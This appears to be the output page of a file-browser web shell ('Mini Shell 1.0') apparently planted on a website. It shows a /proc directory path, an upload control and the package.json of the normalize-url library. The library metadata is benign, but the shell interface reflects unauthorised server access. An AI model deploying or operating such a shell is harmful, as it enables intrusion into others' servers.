HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/normalize-url/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/normalize-url/package.json
{
	"name": "normalize-url",
	"version": "7.1.0",
	"description": "Normalize a URL",
	"license": "MIT",
	"repository": "sindresorhus/normalize-url",
	"funding": "https://github.com/sponsors/sindresorhus",
	"author": {
		"name": "Sindre Sorhus",
		"email": "sindresorhus@gmail.com",
		"url": "https://sindresorhus.com"
	},
	"type": "module",
	"main": "./index.cjs",
	"module": "./index.js",
	"exports": {
		"import": "./index.js",
		"require": "./index.cjs"
	},
	"engines": {
		"node": ">=12.20"
	},
	"scripts": {
		"test": "xo && c8 ava && tsd"
	},
	"files": [
		"index.js",
		"index.cjs",
		"index.d.ts"
	],
	"keywords": [
		"normalize",
		"url",
		"uri",
		"address",
		"string",
		"normalization",
		"normalisation",
		"query",
		"querystring",
		"simplify",
		"strip",
		"trim",
		"canonical"
	],
	"devDependencies": {
		"ava": "^4.0.1",
		"c8": "^7.11.0",
		"tsd": "^0.19.1",
		"xo": "^0.47.0"
	},
	"c8": {
		"reporter": [
			"text",
			"lcov"
		]
	}
}